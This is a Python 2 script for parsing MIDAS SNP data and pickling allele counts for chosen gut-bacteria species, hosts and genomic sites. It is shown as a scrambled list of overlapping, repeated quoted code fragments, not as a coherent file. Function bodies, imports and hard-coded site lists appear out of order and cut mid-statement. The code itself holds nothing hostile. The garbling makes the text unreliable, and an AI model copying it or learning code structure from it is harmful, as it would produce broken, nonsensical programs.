('1339327.3.peg.4421',", "pickle very specific information (allele identity and counts) # for small set of", "location) for contig, location, gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\"", "contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization", "dicts for each host-species pair for subjects, species, sites in desired_host_species_sites: # Get", "sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict,", "for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) 
desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) #", "SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for", "defaultdict import pickle import bz2 import numpy import os, sys # Desired samples", "from numpy.random import choice, random as np_random, randint import random from collections import", "subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id, contig, location in sites:", "('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203),", "1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]),", "# Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items))", "-> allele count allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id) ->", "assigned indiscriminately pvalue = float(info_items[5]) # Only look at sites of interest if", "sites of interest if (contig, location, gene_name) not in desired_sites: continue # Store", "species_name) # Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False)", "[(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'],", "variant type 
variant_type_map = {} num_sites_processed = 0 # Loop over sites in", "sample -> site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load", "information # ===================================================================== # sample -> site -> (ref allele, alt allele) sample_site_allele_dict", "items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig, location)", "Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples =", "subjects, species, sites in desired_host_species_sites: # Get all samples within the host desired_samples", "# ===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r')", "desired_sample_idxs = [] for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs", "# =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names", "are given as gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites =", "bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614',", "[(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'],", "snps_dir, 'r') # 
===================================================================== # Process allele information # ===================================================================== # sample ->", "Script to pickle very specific information (allele identity and counts) # for small", "info_items[3] polarization = 'R' # note R was assigned indiscriminately pvalue = float(info_items[5])", "from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils", "desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id) ->", "-> variant type variant_type_map = {} num_sites_processed = 0 # Loop over sites", "counts for specific samples at specific sites # where sites are provided as", "if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site", "polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') #", "of desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = []", "all desired samples for idx in desired_sample_idxs: alt, depth = [float(num) for num", "bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = []", "% snps_dir, 'r') # Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:]", "import bz2 import numpy import os, sys # Desired samples and sites #", "randint import random from collections import defaultdict import pickle import bz2 import numpy", "# Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # 
=====================================================================", "provided as (contig, location, gene_id) tuples # TODO: move to parse_midas_data later #", "allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r')", "long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene: continue for idx", "'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in", "defaultdict(dict) # Map: site (contig, location, gene_id) -> variant type variant_type_map = {}", "[float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt,", "core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import choice, random as np_random,", "import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy", "allele count allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id) -> variant", "-> site (contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map:", "+= 1 items = line.split() # Load information about site info_items = items[0].split(\"|\")", "% (ddir) os.system('mkdir -p %s' % pdir) # Store these two dicts for", "+= subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id, contig, location in", "snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1", "counts) # for small set of given QP pairs at given sites from", "dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) 
# Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map,", "snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample", "items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map,", "information (allele identity and counts) # for small set of given QP pairs", "counts at this site for all desired samples for idx in desired_sample_idxs: alt,", "very specific information (allele identity and counts) # for small set of given", "purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file =", "desired_sites_no_gene = [(contig, location) for contig, location, gene_id in desired_sites] # SNPs directory", "variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl'", "R was assigned indiscriminately pvalue = float(info_items[5]) # Only look at sites of", "su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from", "# Script to pickle very specific information (allele identity and counts) # for", "population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed", "= [(contig, location) for contig, location, gene_id in desired_sites] # SNPs directory snps_dir", "tuples # TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, 
desired_samples=[], desired_sites=[],", "(allele identity and counts) # for small set of given QP pairs at", "snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample", "and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split()", "desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id, contig, location", "sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items", "up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p", "specific information (allele identity and counts) # for small set of given QP", "sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig,", "[('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421',", "polarization = 'R' # note R was assigned indiscriminately pvalue = float(info_items[5]) #", "= (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # ===================================================================== #", "\\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\", "= defaultdict(dict) # Map: site (contig, location, gene_id) -> variant type variant_type_map =", "Process annotated_snps information # ===================================================================== # Open post-processed MIDAS 
output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\"", "idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in", "\"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) # Store these two dicts", "= snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if", "# sample -> site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) #", "this site for all desired samples for idx in desired_sample_idxs: alt, depth =", "without gene names desired_sites_no_gene = [(contig, location) for contig, location, gene_id in desired_sites]", "if (contig, location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele =", "% snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for", "allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id) -> variant type variant_type_map", "sites # sites are given as gene_id, contig, location tuples # inconsistent but", "these two dicts for each host-species pair for subjects, species, sites in desired_host_species_sites:", "gene_id) tuples # TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[],", "'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351),", "desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, 
variant_type_map = parse_snps_specify_sites_details(species, desired_samples,", "\\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741',", "gene_name)] = variant_type # Store alt and depth counts at this site for", "'r') # ===================================================================== # Process allele information # ===================================================================== # sample -> site", "about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name =", "gene_name) not in desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)] =", "Desired samples and sites # sites are given as gene_id, contig, location tuples", "at sites of interest if (contig, location, gene_name) not in desired_sites: continue #", "Store these two dicts for each host-species pair for subjects, species, sites in", "site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2]", "# Set up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir)", "'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001',", "sites are provided as (contig, location, gene_id) tuples # TODO: move to parse_midas_data", "are provided as (contig, location, gene_id) tuples # TODO: move to parse_midas_data later", "MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # 
Process allele", "continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)]", "(['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites", "sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as", "('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts", "# Only look at sites of interest if (contig, location, gene_name) not in", "\\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\", "items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples:", "later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene", "% snps_dir, 'r') # ===================================================================== # Process allele information # ===================================================================== # sample", "= snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" %", "sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species,", "given sites from utils import sample_utils as su, parse_midas_data, 
substitution_rates_utils, config, temporal_changes_utils, snps_utils,", "few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory", "(ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # ===================================================================== # Open", "('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96',", "directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' %", "in desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)] = variant_type #", "desired_host_species_sites: # Get all samples within the host desired_samples = [] for subject", "-> site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt", "snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map()", "list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample))", "'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171',", "location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map", "in desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx]", "as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np", "about site 
info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele =", "ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene: continue for idx in", "= 0 # Loop over sites in annotated_snps.txt file for line in snp_file:", "= [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\", "in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map =", "contig, location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\", "output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired sample", "# sites are given as gene_id, contig, location tuples # inconsistent but bleh", "gene names desired_sites_no_gene = [(contig, location) for contig, location, gene_id in desired_sites] #", "= info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in", "desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ #", "snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired sample idxs", "all samples within the host desired_samples = [] for subject in subjects: desired_samples", "sys # Desired samples and sites # sites are given as gene_id, contig,", "'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264',", "identity and counts) # for small set of given QP pairs at given", 
"\\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\", "# =========================================================================== # Loads allele counts for specific samples at specific sites #", "snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # ===================================================================== # Open post-processed MIDAS", "'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264',", "to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version", "for idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] =", "collections import defaultdict import pickle import bz2 import numpy import os, sys #", "[('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065',", "\\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites =", "= [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I',", "'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 
5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171',", "snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process allele information #", "host desired_samples = [] for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat", "if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items", "for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth)", "= info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization =", "for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for", "snp_alleles_file: items = line.split() # Load information about site info_items = items[0].split(\"|\") contig", "=========================================================================== # Loads allele counts for specific samples at specific sites # where", "= su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\"", "= snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if", "= long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization = 'R' # note", "9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L),", "if (contig, location, gene_name) not in desired_sites: continue # Store variant type variant_type_map[(contig,", "Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, 
variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir, ('_').join(subjects), species), 'wb')) sys.stderr.write(\"Done!\\n\")", "= line.split() # Load information about site info_items = items[0].split(\"|\") contig = info_items[0]", "sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information #", "host-species pair for subjects, species, sites in desired_host_species_sites: # Get all samples within", "location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # =====================================================================", "sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map() # Set up", "for subjects, species, sites in desired_host_species_sites: # Get all samples within the host", "'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507',", "random as np_random, randint import random from collections import defaultdict import pickle import", "line in snp_alleles_file: items = line.split() # Load information about site info_items =", "site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2]", "at this site for all desired samples for idx in desired_sample_idxs: alt, depth", "items = line.split() # Load information about site info_items = items[0].split(\"|\") contig =", "= long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene: continue for", "\\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\", "file for line in 
snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" %", "subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for", "('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples =", "Store alt and depth counts at this site for all desired samples for", "samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map #", "move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate", "in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location,", "\\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\", "for small set of given QP pairs at given sites from utils import", "site for all desired samples for idx in desired_sample_idxs: alt, depth = [float(num)", "[('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', 
[('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358),", "contig, location, gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory,", "Process allele information # ===================================================================== # sample -> site -> (ref allele, alt", "===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') #", "information # ===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir,", "\\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\", "indiscriminately pvalue = float(info_items[5]) # Only look at sites of interest if (contig,", "%s' % pdir) # Store these two dicts for each host-species pair for", "(['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235']", "Store variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and depth", "samples for idx in desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")]", "'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001',", "each host-species pair 
for subjects, species, sites in desired_host_species_sites: # Get all samples", "# TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'):", "pvalue = float(info_items[5]) # Only look at sites of interest if (contig, location,", "parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene = [(contig,", "location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a", "(contig, location, gene_id) -> variant type variant_type_map = {} num_sites_processed = 0 #", "random from collections import defaultdict import pickle import bz2 import numpy import os,", "= parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' %", "(['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'],", "= samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps", "two dicts for each host-species pair for subjects, species, sites in desired_host_species_sites: #", "# Store alt and depth counts at this site for all desired samples", "= bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process allele information # =====================================================================", "site (contig, location, gene_id) -> 
